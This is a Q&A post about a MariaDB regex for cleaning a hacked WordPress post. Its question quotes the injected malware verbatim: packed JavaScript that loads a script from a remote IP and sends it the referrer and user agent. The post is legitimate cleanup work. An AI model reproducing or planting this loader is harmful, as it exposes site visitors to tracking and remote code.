# MariaDB Multiline RegEx

Tags: mariadb-10.1

I'm running a SQL query in MariaDB under PHPMyAdmin as follows:

```
select REGEXP_REPLACE(post_content,'(?m)<noindex>[.\r\n]*</noindex>','') from wp_posts where ID = 318
```

I'm trying to remove some hacker's script from a WordPress post, everything between start tag noindex and the end tag noindex, but the end tag noindex is on the second line. First I want to test the RegEx with a query, then later run in an update. I can't get it to work unless I limit the changes to one line.

The column post_content is defined as LongText.

```
I <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytkty|var|u0026u|referrer|ezezh||js|php'.split('|'),0,{}))
</script></noindex> was looking to accomplish etc... etc...
```

The same regex works fine in NotePad++ when I check the "Multiline" option.

I looked at a download of the database on my local hard-drive to determine what is really there - not sure this adds anything or not:

[image]
I was thinking maybe PHP-MyAdmin or WordPress were using 
 or somehow hiding the actual value. But I think even in the backupdownload/they represent the new line as \n as a literal rather a hex value.

If I copy the longtext value from PhpMyAdmin to NotePad++ and turn on the show-symbols, it looks like this: 
[image]
So that's why I think the carriage-return/line-feed are really stored in the longtext column value.

Version: 10.1.38-MariaDB

Comment: This kind of works, but it leaves the text split across the first two lines: select REGEXP_REPLACE(post_content,'(?m)<noindex>.*$|^.*</noindex>','') from wp_posts where ID = 318

Comment: Also tried this: select REGEXP_REPLACE(post_content,'(?m)<noindex>[.\\x(A)\\x(D)]*</noindex>','') from wp_posts where ID = 318, but doesn't replace anything.

Comment: This seems logical too, but doesn't work: select REGEXP_REPLACE(post_content,'(?m)<noindex>[.[[:space:]]]*</noindex>','') from wp_posts where ID = 318

Answer (score 0, accepted):

Just through trial and error and persistence, I found a solution after about 2.5 hours:

```
select REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex>','') from wp_posts where ID = 318
```

If anyone could explain why the above solutions in my question didn't work though, that would still be appreciated.

Reference to (*CRLF) on this page: 
https://mariadb.com/kb/en/library/pcre/#multiline-matching